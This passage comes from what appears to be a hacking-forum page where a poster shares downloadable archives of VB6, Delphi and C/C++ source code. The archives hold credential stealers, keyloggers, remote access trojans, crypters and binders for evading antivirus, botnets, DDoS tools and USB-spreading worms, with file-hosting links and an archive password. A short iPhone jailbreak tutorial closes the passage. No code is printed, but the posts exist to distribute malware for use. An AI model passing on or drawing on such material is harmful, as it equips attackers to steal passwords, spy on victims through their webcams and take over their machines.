- NO-IP Stealer
- Stealer by mar
- Super Stealer
- USB Stealer v1.0
- Windows CD Key Stealer
- Zero Stealer

Protectors:
- Rainerstoff 3.2b
- Fly Crypter v2d + USG 0.3
- Azarel Binder
- Biohazard Binder
- bl0b Binder + USG
- bl0b Protector v1
- Cyber Crypt 7
- Devil Binder 1.0
- Dynasty Crypter + USG
- Easy Bind
- Exe Binder
- EXE Protection Software
- Extra Element Crypter
- FuzzBuzz Crypter
- Half-Polymorph Crypter
- Hao Crypter
- Incrypter Private
- NRG Binder
- Protect Process
- Rainerstoff
- Relapse Private Crypter
- SCB Lab Malware Tool
- SHNI Joiner Source
- SkullByte Crypter
- VB Undetector
- White Crypt
- P-Obfucator 1.1
- Source Undetector 2.5

Other:
- DLL Exe Icon Viewer
- Full MP3 Player
- App Restarter
- Assembler
- Bandwidth Killer
- Basic Proxy Tool
- Capture Screen
- CD Info
- Change Icon
- Icon Change
- Change Startup
- Change Internet Explorer Name
- Clone File Information
- CMD Source
- Compare Files
- Compress
- Compression
- Cool Multi-Tab Browser
- CS Internet Tools
- CS Translator (Counter Strike)
- CyberCafe Timer
- DDoS Source
- Deep Freeze Password Remover
- Disable Task Manager and Others
- DLL Register
- Drag & Drop
- Drive Info
- Encrypt Algorithms
- EOF Packer
- File Spliter
- File Version Info
- Get and Put in FTP
- Get IP
- Hardware ID Anti-Crack
- Hash Tables
- iCam v1.0
- Icon Viewer
- Icon Changer
- Icon Changing
- IP Locator
- IP + DHCP Statistics
- IP and Username
- Junk Code Generator
- Kill Switch
- Melt
- Melt and Install
- MP3 Player
- MSN Freezer Live
- OCR
- OCX
- Port Scanner
- Process Hide
- Process Hide Other
- Process Injection
- Process viewer
- Remote File Manager
- Remote Webcam Capture
- RS Account Checker
- Socks4 Example
- Socs5
- Sub7 Startup Method
- TEA
- TEB
- USB Spread
- Unique RunPE Maker v1.0
- USB Detection
- Vampire Worm
- VB Compiler
- VB Crypto
- Webcam Capture
- WinBig
- YouTube Bot v1.1.3

Download link:

Code:
http://uploading.com/files/d571mc3m/VB6%2BPack%2B2.rar/
 
Credit:flAmingw0rm

[Delphi] Collection of Source Codes [MEGA PACK]

Hello Open Hackers
I've decided to share my pack with Delphi source. It contains many great source codes and examples.

Note: These source codes are coded in Delphi, so you will need Delphi.




Download link (for Delphi):
http://www.megaupload.com/?d=XMFLF0UW

This pack contains the following source codes:
Delphi Binder
Icon Changer
Remote Desktop
Reverse Connection Example
Turkojan Crypter
Spy-NET v2.7 Beta 02
Epeius Crypter 2.3
FTP Logger
SS-RAT (older)
SS-RAT (Newest)
Advanced Alart Clock
Epeius Crypter 2.5
OP Crypter
Delphos Crypter v3
Firefox 3 & MSN & IE7 Passwords
Compare Files
Memory Execute Generator
File Cloner
Tech Binder + USG
Crestra Binder Private
Underground Crypter
Open&Close CD Drives
Binder - Open Source
PI Crypter
Multi MD5 Online Hash
bmp to gif
Log's Finder
Professional Keylogger
Computer Information
File Joiner
HH Undetector
Examble Binder
Ex Crypter

Download link (for Source Codes):
http://www.multiupload.com/B628ZTCLGL

Password (included into the archive as well):
flAmingw0rm

Please reply to keep this topic alive. Don't run if there are any .exe files.

Credit:  flAmingw0rm

[C/C++] Collection Of Source Codes Of Hacking Tools [MEGA PACK]

Hello guys,

I am posting a new pack, this time with C/C++ sources. Many people asked me for C/C++ pack, so here it is.. you can learn a lot from it.

The pack contains the following sources:
Port Scanner
Dark Crypter
FireFox 3.6 Decrypter
Agony
Aryan RAT v0.3
Aryan RAT v0.4
Aryan RAT v0.5
Basic Keylogger Source
Black Sun
BlindSpot v1.0 (Binder)
Files Merger
Call Of Duty 6 - Modern Warfare 2 - MPHack
Cryptic3 Crypter
DCI Bot
Down Trojan RAT
Client RAT
El Backdoor Small v1/2.0
Example Drag&Drop
F0xit 0.1
FBI RAT
gh0st 3.6
Harvecter bot
hBot Source
JABT1.2 - Justin Another Binder Tool
Juu2 IE7+FF steal
Little Joiner
Loading DLL infect PE
LocustPEA
Mail Sender - C++
Dump MSN Contacts
Nerzhul
Net Bot Attacker 5.5 RAT+DDOS
Polymorphic crypter
ProAgent V1.21
PsyRAT 2
Rat-b
Ratling
Reptile Bot
Rhapsody reverse connecting RAT
ri0tv5 Bot
UDP Tunnel
SpecialTrojan V5.0
Viotto OCX registrator - Source

Download link (mega pack of source codes):

Code:
http://uploading.com/files/1md3e829/C%2B%2526%2BC%2B%2B%2B-%2BPack%2B1.rar/

[TUTORIAL] Jailbreak iPhone 3gs and Unlock






[1] We need redsn0w. Download from here.
We need too iOS 4.2.1 from here.

[2] Connect your iphone to computer and launch iTunes.

[3] Restore iPhone. Press SHIFT and when click "Restore" button. (For mac pres options and click "Restore button")

[4] Navigate and select iOS 4.2.1.(Where we downloaded).

[5] Once iTunes has finished restore open redsn0w.

[6] Click "Browse" button. And select iOS 4.2.1 firmware.

[7] Once the firmware has been verified click the Next button to continue.

[8] Redsn0w will now prepare for jailbreak. Just wait.

[9] Now select options you would like. (Select Cydia)

[10] Please plug iphone off. When click "Next" button.

[11] RedSn0w will now guide you through the steps to get into DFU mode. You can find more help with DFU mode.

[12] Your iPhone will now reboot.

[13] RedSn0w will then begin uploading the new RAM Disk and Kernel.

[14] Once this is complete you will be notified that RedSn0w is done. Click the Finish button. When your iPhone finishes rebooting (5 minutes or so) it will be jailbroken with Cydia on the SpringBoard.

IMPORTANT:
To use Redsn0w to help you boot back into your jailbroken device simply select Just boot tethered right now from the options window and click Next.